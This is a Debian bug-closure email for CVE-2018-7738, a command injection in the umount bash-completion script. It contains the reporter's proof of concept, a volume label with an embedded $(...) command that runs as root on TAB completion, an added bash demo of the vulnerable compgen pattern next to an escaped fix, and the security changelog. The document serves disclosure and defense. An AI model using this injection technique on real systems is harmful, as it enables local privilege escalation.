Your message dated Sun, 11 Mar 2018 21:02:07 +0000
with message-id <[email protected]>
and subject line Bug#892179: fixed in util-linux 2.29.2-1+deb9u1
has caused the Debian Bug report #892179,
regarding util-linux: CVE-2018-7738: code execution in bash-completion for umount
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
892179: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security
Hi,
when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from the umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.
Example:
as regular user:
------------------------------
$ mkdir empty
$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)
$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.
(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
------------------------------
as different user or even root:
------------------------------
# ls -la
total 28
drwxr-xr-x 2 root root 4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
# umount <TAB> ^C
# ls -la
total 28
drwxr-xr-x 2 root root 4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r-- 1 root root 0 Feb 14 10:01 foo
------------------------------
I tested it using the latest Debian GNU/Linux 9.3 (stretch) with a default
installation including a desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1
uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux
It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7
Björn Bosselmann
G DATA Software AG
-- System Information:
Debian Release: 9.3
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages bash-completion depends on:
ii bash 4.4-5
ii dpkg 1.18.24
bash-completion recommends no packages.
bash-completion suggests no packages.
-- no debconf information
--- End Message ---
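The report above shows the effect but not the mechanism. The completion script built its candidate list from the mount table and handed it to bash's `compgen -W`, which splits the word list on IFS and then performs shell expansion on every word, command substitution included, so a mount point containing `$(...)` is executed by whoever presses <TAB>. That is also why the payload sets IFS to ":" inside the substitution: the list is split on whitespace before expansion, so the command must not contain a space. The script below is an added example, not the util-linux completion code or the Debian fix. It runs the vulnerable pattern against a constructed mount list (a stand-in for `findmnt -lno TARGET` output, so nothing has to be mounted) and shows one hardened alternative that filters candidates without expansion and escapes them with `printf %q`. The function names and the sample paths are invented for the demonstration.

```shell
#!/usr/bin/env bash
# Added example (not from util-linux or Debian): why passing unescaped mount
# points to `compgen -W` is a command-execution bug, and one safe alternative.
# Re-exec under bash if started by a POSIX sh: compgen and [[ ]] are bash-only.
if [ -z "${BASH_VERSION:-}" ]; then exec bash "$0" "$@"; fi

# Constructed stand-in for `findmnt -lno TARGET`: one mount point per line.
# The second entry is attacker-controlled (think udisks2/FUSE); it contains
# no whitespace because compgen splits the word list on IFS before expanding.
# $1 is the file the payload tries to create when the word gets expanded.
sample_mounts() {
    local marker=$1
    printf '%s\n' \
        '/' \
        "/media/user/\$(IFS=\":\";cmd=\"touch:$marker\";\$cmd)" \
        '/media/user/My Disk'
}

# Vulnerable pattern: the whole list goes through `compgen -W`, which expands
# each word, so the $(...) runs as the completing user. Note that it also
# splits "/media/user/My Disk" into two useless candidates.
unsafe_complete() {
    local cur=$1 marker=$2 mounts
    mounts=$(sample_mounts "$marker")
    compgen -W "$mounts" -- "$cur"
}

# Hardened pattern: never hand untrusted strings to `compgen -W`. Read one
# mount point per line, keep literal prefix matches (no expansion happens in
# a quoted [[ ]] pattern), and emit each with printf %q so spaces and shell
# metacharacters reach readline as escaped literal characters.
safe_complete() {
    local cur=$1 marker=$2 mp
    while IFS= read -r mp; do
        [[ $mp == "$cur"* ]] && printf '%q\n' "$mp"
    done < <(sample_mounts "$marker")
}

# Stand-alone demo: show the marker file appearing with the unsafe version
# and staying absent with the safe one.
demo_dir=$(mktemp -d)
echo "== unsafe: compgen -W on raw mount points =="
unsafe_complete /media "$demo_dir/pwned"
[ -e "$demo_dir/pwned" ] && echo "payload ran: $demo_dir/pwned was created"
rm -f "$demo_dir/pwned"
echo "== safe: literal prefix filter + printf %q =="
safe_complete /media "$demo_dir/pwned"
[ -e "$demo_dir/pwned" ] || echo "payload did not run"
rm -rf "$demo_dir"
```

Running the unsafe function as root reproduces the report's `touch foo` without any mount being involved; the safe function returns `/media/user/\$\(IFS=...` and `/media/user/My\ Disk` as two intact, escaped candidates.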
--- Begin Message ---
Source: util-linux
Source-Version: 2.29.2-1+deb9u1
We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <[email protected]> (supplier of updated util-linux package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 07 Mar 2018 19:29:09 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk-udeb libblkid1
libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1
libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev
libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv
Architecture: source
Version: 2.29.2-1+deb9u1
Distribution: stretch-security
Urgency: high
Maintainer: Debian util-linux Maintainers <[email protected]>
Changed-By: Salvatore Bonaccorso <[email protected]>
Closes: 892179
Description:
bsdutils - basic utilities from 4.4BSD-Lite
fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
libblkid-dev - block device ID library - headers and static libraries
libblkid1 - block device ID library
libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb)
libfdisk-dev - fdisk partitioning library - headers and static libraries
libfdisk1 - fdisk partitioning library
libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
libmount-dev - device mounting library - headers and static libraries
libmount1 - device mounting library
libmount1-udeb - stripped down device mounting library, for debian-installer (udeb)
libsmartcols-dev - smart column output alignment library - headers and static librar
libsmartcols1 - smart column output alignment library
libsmartcols1-udeb - stripped down smart column output alignment library, for debian-in (udeb)
libuuid1 - Universally Unique ID library
libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb)
mount - tools for mounting and manipulating filesystems
setpriv - tool to run a program with different Linux privilege settings
util-linux - miscellaneous system utilities
util-linux-locales - locales files for util-linux
util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
uuid-dev - Universally Unique ID library - headers and static libraries
uuid-runtime - runtime components for the Universally Unique ID library
Changes:
util-linux (2.29.2-1+deb9u1) stretch-security; urgency=high
.
* Non-maintainer upload by the Security Team.
* bash-completion: (umount) use findmnt, escape a space in paths
(CVE-2018-7738) (Closes: #892179)
Checksums-Sha1:
5575478b2b095f0df2f6c30aa21fef1dbecb9acc 4101 util-linux_2.29.2-1+deb9u1.dsc
b488f185e74187a63b55baef9d3f48d5b1780118 4277668 util-linux_2.29.2.orig.tar.xz
3d73e73f2402bf7b2b61c1e4e7c451d59e32db11 74280 util-linux_2.29.2-1+deb9u1.debian.tar.xz
Checksums-Sha256:
f84985e3b01d7758bf835484a5861d687ffee07778dadab5adc10a7e312da950 4101 util-linux_2.29.2-1+deb9u1.dsc
accea4d678209f97f634f40a93b7e9fcad5915d1f4749f6c47bee6bf110fe8e3 4277668 util-linux_2.29.2.orig.tar.xz
33867c063f828a1937c1dd4797b3cd977a2e7da31eb1227c396f7dbf06dde3a6 74280 util-linux_2.29.2-1+deb9u1.debian.tar.xz
Files:
5041092813b91904152dd2bbe25504f8 4101 base required util-linux_2.29.2-1+deb9u1.dsc
63c40c2068fcbb7e1d5c1d281115d973 4277668 base required util-linux_2.29.2.orig.tar.xz
7532de196c10edf323d41a8cdd745a8f 74280 base required util-linux_2.29.2-1+deb9u1.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
--- End Message ---